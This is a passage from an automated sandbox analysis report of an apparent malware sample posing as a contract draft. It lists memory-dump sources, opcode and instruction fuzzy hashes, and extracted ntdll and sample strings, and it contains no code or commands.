                                                                                                                        • Opcode Fuzzy Hash: 1f1f19c1b197651d8d75ec47f5a3d49f05f31c59b327a46873976ab5d37eec7e
                                                                                                                        • Instruction Fuzzy Hash: BDF0AF706593049FC310EF68C445A1BF7E4FF98710F80465AB898DB394E634E900CB96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                        • Instruction ID: a255d424a4dc6c927bb3d4c465695fc852ce311719750ff573b958c35370a1b1
                                                                                                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                        • Instruction Fuzzy Hash: 0FF02472600200AFE314DF25CC00F86B7E9EFE8304F148078A544CB164FAB0DD10C694
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
                                                                                                                        • Instruction ID: 19df370ede48d378798e223da9b4cb2de232315d7249ec021c158208ef82181a
                                                                                                                        • Opcode Fuzzy Hash: ae0507967317bd6a6f0c3e47b5aa2870c17e7855cf5eadace00ae7f604956a71
                                                                                                                        • Instruction Fuzzy Hash: 8AF06270A01249DFCB04EFA9C515EAEF7B4FF18300F108059B955EB399DA34EA01CB64
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
                                                                                                                        • Instruction ID: f36c0fd6dd9cdb6503e58c11651ea6757317af21fb2b42147e68092d077f135d
                                                                                                                        • Opcode Fuzzy Hash: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
                                                                                                                        • Instruction Fuzzy Hash: 7BF0B4719967D5DFE733DB6CC444B21FBD49B01621F084DAAD74B875C2C7A4DA80C650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
                                                                                                                        • Instruction ID: 5ccd9cd67484830c00e09b31cb87b58aedf807e95cd2f0600371397d1e3db2d7
                                                                                                                        • Opcode Fuzzy Hash: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
                                                                                                                        • Instruction Fuzzy Hash: 3FF0272E41A6808BCF329B2C68983DAEB55E781A24F09144DF4A057209C6748883C3A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c148b8376113eaaee8e0d3490ba46880e1137932cd379f37de2ef4e809b7f09
                                                                                                                        • Instruction ID: b46435dd72bf7a016a8b7172a4572b3d9618608dcc926e1451c0a746dcfa163d
                                                                                                                        • Opcode Fuzzy Hash: 5c148b8376113eaaee8e0d3490ba46880e1137932cd379f37de2ef4e809b7f09
                                                                                                                        • Instruction Fuzzy Hash: D4F0E271511691DFE3239B2CC948B11FBE89B857A1F089467D50697523C760E880DA51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                        • Instruction ID: 0e6076e6981fb16d23bad64a048914ba76001553a721abaed099aa690958608b
                                                                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                        • Instruction Fuzzy Hash: 81E0D8323006016BE7119E599CC4F47BB6EDFD6B10F050079B6045F256CAE2DC1986A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                        • Instruction ID: 21abb0275011dc807c9c6189ef12aa37eabace2ed3cc2651f38b763893dae151
                                                                                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                        • Instruction Fuzzy Hash: B1F01C721046049FE7218F0DE984F62FBB8EB45364F45C166E6099B661D379EC44CBA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                        • Instruction ID: fbff1d49b80a0f52ab5d7b6267f0d592d85c73777b170b3b40a6e253f4de0dac
                                                                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                        • Instruction Fuzzy Hash: 5DF0E539204741DBDB17CF19C040B95FBE4FB413A0B000094FC428B341DB75E982CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                        • Instruction ID: 527e57a11d02900a5696d38ce279acb97cd39b140376003db12607fa52326762
                                                                                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                        • Instruction Fuzzy Hash: C1E0D832244145ABD3291A698808B66FBA5EBD57A0F150429E2028B156DB70DD42C7D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b25c487dc84ef23dcc951f210a18da3bcb155db987adc1ebcd073dc31c20fe08
                                                                                                                        • Instruction ID: 9159497725958f7a09d5e198e88793681d8297a144976561d5f92bc413351029
                                                                                                                        • Opcode Fuzzy Hash: b25c487dc84ef23dcc951f210a18da3bcb155db987adc1ebcd073dc31c20fe08
                                                                                                                        • Instruction Fuzzy Hash: 67F0E531A255954FE772D73CEA44B56F7F1AB10630F4E0564D4128BD16C330DC40C650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                        • Instruction ID: 132e08e4d955a0d987bda54132559c613b9a1b8bde6428744ecd29b17995becd
                                                                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                        • Instruction Fuzzy Hash: 1AE0DF32A00120BBDB2197998D09F9AFEACDBD4EA0F090054B601EB0E4E530DE00D6D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                        • Instruction ID: be7b28d7586b3abbd8cd96d32608b0fa690ae90a7d5b443a5ee4f56c1f77fe41
                                                                                                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                        • Instruction Fuzzy Hash: B4E09B316803588FCB259A1DC141A53FFF8DFB5660F1590ADE90547612C231F842C6D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Instruction Fuzzy Hash: 65D0C935216E80CFD71BCB0CC5A4B55B3A8BB44F44F8144D0F802CBB26D62CD980CA00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                        • Instruction ID: d5677f1eed71fd4a38bc23dfd53e70e83a5399b2a8535804730f348fa6c4e665
                                                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                        • Instruction Fuzzy Hash: D3C01232290648AFC712AE99CD01F02BBA9EBA8B50F000421F2048B6B0D631E820EA84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                        • Instruction ID: 8d335537376763a19074f62af8a8663f3d36513744647193e8168ecec227fc30
                                                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                        • Instruction Fuzzy Hash: F4D01236100248EFCB01DF41C890D9AB72AFBD8710F108019FD19076118A31ED63DA90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                        • Instruction ID: 805a0907c37c8a13650b51a1cfbad4d0d16fb2ea3bbf77f7542ad6d795f24eec
                                                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                        • Instruction Fuzzy Hash: F1C04879B01A428FCF16DB2ED298F49B7E4FB44750F150890E885CBB26EA64E941CA10
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        Strings
                                                                                                                        • ExecuteOptions, xrefs: 017746A0
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01774655
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01774725
                                                                                                                        • Execute=1, xrefs: 01774713
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01774742
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01774787
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017746FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017702BD
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017702E7
                                                                                                                        • RTL: Re-Waiting, xrefs: 0177031E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 01777B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 01777BAC
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01777B7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0177728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01777294
                                                                                                                        • RTL: Resource at %p, xrefs: 017772A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 017772C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >$>'$'$O$P$Z$[$e$m$r$r$y$zt$'$'
                                                                                                                        • API String ID: 0-1210455376
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$O$S$\$s
                                                                                                                        • API String ID: 0-3854637164
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4D$nx
                                                                                                                        • API String ID: 0-470906666
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: m.E?
                                                                                                                        • API String ID: 0-3786607957
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l
                                                                                                                        • API String ID: 0-612859260
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b0d40f52e8075eee8989e374ec309aeb0f4782be457fc1bfe01a5aa18b295872
                                                                                                                        • Instruction ID: e02c6a34d76679d25a993f125dc5a285d304913138ee2b7dbc4da5f55a700e03
                                                                                                                        • Opcode Fuzzy Hash: b0d40f52e8075eee8989e374ec309aeb0f4782be457fc1bfe01a5aa18b295872
                                                                                                                        • Instruction Fuzzy Hash: 30118E75A103486BD710EBA4DC41FEFBBACEB89710F004409F918AB241D7B0B941CBA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d9cc9a03e5f4229d80ca7d3b3d3c29f45b2551a005eb5de28ef72e2700d796d8
                                                                                                                        • Instruction ID: cd37992f60b15be940b40ce1d1d1e0ddca3cb941a63d1ff4109b9931e244050c
                                                                                                                        • Opcode Fuzzy Hash: d9cc9a03e5f4229d80ca7d3b3d3c29f45b2551a005eb5de28ef72e2700d796d8
                                                                                                                        • Instruction Fuzzy Hash: EA115E75A10344AFD710EBA4DC41FEFB7ACEB89710F004509FA186B281D7B0B955CBA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c8074bed1560fbd93ead97a32b0684ce64102b7d9385dde0331ac63bc875bb8
                                                                                                                        • Instruction ID: d3a74fdae604cdd93852df12aa2d373c5b0d43c28b8521a5b0e3f459e0adb360
                                                                                                                        • Opcode Fuzzy Hash: 5c8074bed1560fbd93ead97a32b0684ce64102b7d9385dde0331ac63bc875bb8
                                                                                                                        • Instruction Fuzzy Hash: 0301D6B6214208BBCB04DE99DC80EEB77ADEF8C750F008108BA09E7241D670FC51CBA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 098f7b74469876a9bdc5720f129fe6faaf877ff332103c0a8216edbc81a51502
                                                                                                                        • Instruction ID: 4f5dda88b1dec17ed8614c09266da78fe9e2b269521399ab36cdfbe311500eec
                                                                                                                        • Opcode Fuzzy Hash: 098f7b74469876a9bdc5720f129fe6faaf877ff332103c0a8216edbc81a51502
                                                                                                                        • Instruction Fuzzy Hash: F30199B1C21229AF8F44CFADD88059EBBF8FB48620B10855BE818E7210D77196418FD4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
